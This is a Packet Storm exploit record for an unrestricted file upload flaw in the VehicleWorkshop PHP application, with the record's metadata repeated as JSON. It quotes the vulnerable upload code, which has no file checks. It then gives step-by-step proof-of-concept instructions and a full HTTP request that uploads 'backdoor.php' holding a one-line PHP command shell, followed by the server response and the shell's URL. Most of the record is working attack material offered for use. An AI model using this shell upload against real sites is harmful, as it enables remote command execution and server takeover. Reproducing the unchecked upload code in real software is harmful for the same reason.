ID PACKETSTORM:143618
Type packetstorm
Reporter Touhid M.Shaikh
Modified 2017-08-01T00:00:00
Description
`# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload
# Exploit Author: Touhid M.Shaikh
# Date: 1/08/2017
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on : Kali Linux 2.0 64 bit and Windows 7
===================
Vulnerable Page:
===================
http://192.168.1.13/sellvehicle.php
====================
Vulnerable Source:
====================
--------------------------------PHP code-----------
<?php
if(isset($_POST["submit"]))
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $_FILES["file"]["name"]);
--------------------------------------------------
-----------------------HTML Form -----------------
<label for="images"></label>
<label for="file"></label>
<input type="file" name="file" id="file" /><input type="hidden"
name="image" />
-----------------------------------------------------------------------
U can upload Shell or File via Regular or customer User Account.
================= POC ======================
We need to login any customer account or create an account (
http://192.168.1.13/registration.php) and login.
After customer panel open Navigate to
http://192.168.1.13/sellvehicle.php
and feed data and upload you unrestricted file.
--------------------------Request---------------------------
POST /sellvehicle.php HTTP/1.1
Host: 192.168.1.13
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------144421253520516158491092952973
Content-Length: 1085
Referer: http://192.168.1.13/sellvehicle.php
Cookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10
Connection: close
Upgrade-Insecure-Requests: 1
.
.
.
.skip
Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: application/x-php
<?php system($_GET['cmd']); ?>
.
.
.
.skip
------------------------------------------------------------------------------
--------------------------Rsponse --------------------------
HTTP/1.1 200 OK
Date: Mon, 31 Jul 2017 20:38:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 2909
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------
====================================================================
Now You Can Access you Shell or File in /upload/backdoor.php
http://192.168.1.13/upload/backdoor.php
Enjoy !
Regards.
Touhid Shaikh
`
{"id": "PACKETSTORM:143618", "type": "packetstorm", "bulletinFamily": "exploit", "title": "VehicleWorkshop Arbitrary File Upload", "description": "", "published": "2017-08-01T00:00:00", "modified": "2017-08-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/143618/VehicleWorkshop-Arbitrary-File-Upload.html", "reporter": "Touhid M.Shaikh", "references": [], "cvelist": [], "lastseen": "2017-08-02T14:47:22", "viewCount": 1, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-08-02T14:47:22", "rev": 2}, "dependencies": {"references": [], "modified": "2017-08-02T14:47:22", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/143618/vehicleworkshop-upload.txt", "sourceData": "`# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload \n# Exploit Author: Touhid M.Shaikh \n# Date: 1/08/2017 \n# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop \n# Tested on : Kali Linux 2.0 64 bit and Windows 7 \n \n \n \n=================== \nVulnerable Page: \n=================== \n \nhttp://192.168.1.13/sellvehicle.php \n \n==================== \nVulnerable Source: \n==================== \n \n \n--------------------------------PHP code----------- \n<?php \nif(isset($_POST[\"submit\"])) \n{ \nmove_uploaded_file($_FILES[\"file\"][\"tmp_name\"], \n\"upload/\" . $_FILES[\"file\"][\"name\"]); \n \n \n-------------------------------------------------- \n \n-----------------------HTML Form ----------------- \n<label for=\"images\"></label> \n<label for=\"file\"></label> \n<input type=\"file\" name=\"file\" id=\"file\" /><input type=\"hidden\" \nname=\"image\" /> \n \n----------------------------------------------------------------------- \n \nU can upload Shell or File via Regular or customer User Account. \n \n================= POC ====================== \n \nWe need to login any customer account or create an account ( \nhttp://192.168.1.13/registration.php) and login. \n \nAfter customer panel open Navigate to \nhttp://192.168.1.13/sellvehicle.php \n \nand feed data and upload you unrestricted file. \n \n--------------------------Request--------------------------- \n \nPOST /sellvehicle.php HTTP/1.1 \nHost: 192.168.1.13 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 \nFirefox/54.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3 \nContent-Type: multipart/form-data; \nboundary=---------------------------144421253520516158491092952973 \nContent-Length: 1085 \nReferer: http://192.168.1.13/sellvehicle.php \nCookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n. \n. \n. \n.skip \n \nContent-Disposition: form-data; name=\"file\"; filename=\"backdoor.php\" \nContent-Type: application/x-php \n \n<?php system($_GET['cmd']); ?> \n \n. \n. \n. \n.skip \n------------------------------------------------------------------------------ \n \n--------------------------Rsponse -------------------------- \nHTTP/1.1 200 OK \nDate: Mon, 31 Jul 2017 20:38:09 GMT \nServer: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l \nmod_autoindex_color PHP/5.3.1 \nX-Powered-By: PHP/5.3.1 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 \nPragma: no-cache \nContent-Length: 2909 \nConnection: close \nContent-Type: text/html \n------------------------------------------------------------------------------ \n \n \n==================================================================== \n \nNow You Can Access you Shell or File in /upload/backdoor.php \n \nhttp://192.168.1.13/upload/backdoor.php \n \n \nEnjoy ! \n \nRegards. \nTouhid Shaikh \n \n`\n"}
{}